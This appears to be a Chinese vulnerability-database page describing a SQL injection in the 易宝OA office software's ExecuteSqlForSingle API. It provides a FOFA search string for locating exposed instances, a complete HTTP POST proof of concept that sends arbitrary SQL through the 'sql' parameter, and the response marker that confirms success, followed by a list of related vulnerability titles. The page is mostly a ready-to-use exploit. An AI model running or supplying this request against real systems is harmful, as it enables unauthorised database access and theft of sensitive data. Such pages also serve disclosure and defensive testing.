易宝OA ExecuteSqlForSingle SQL注入漏洞

漏洞描述

易宝OA是一款功能非常全面的移动办公软件。该软件存在SQL注入漏洞，攻击者可以获取数据库权限以获取更多敏感信息。

PoC代码

## 易宝OA ExecuteSqlForSingle SQL注入漏洞



## fofa

```

"顶讯科技"

```



## poc

```

POST /api/system/ExecuteSqlForSingle HTTP/1.1

Host: IP:PORT

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36

Content-Length: 103



token=zxh&sql=select substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)&strParameters

```

发送poc 在返回包中存在 `e10adc3949ba59abbe56e057f20f883e` 字符为存在漏洞

漏洞描述

PoC代码

相关漏洞推荐

易宝OA /SmartTradeScan/StockTake/getPosition SQL 注入漏洞 无POC

易宝OA getPosition SQL注入漏洞 POC

易宝OA-getPosition-存在sql注入漏洞 无POC

yibao-oa-executesqlforsingle-sqli: 易宝OA系统ExecuteSqlForSingle接口存在SQL注入 POC

LemonLDAP::NG 操作系统命令注入漏洞 无POC

易宝OA /SmartTradeScan/StockTake/getPosition SQL 注入漏洞无POC

易宝OA-getPosition-存在sql注入漏洞无POC

LemonLDAP::NG 操作系统命令注入漏洞无POC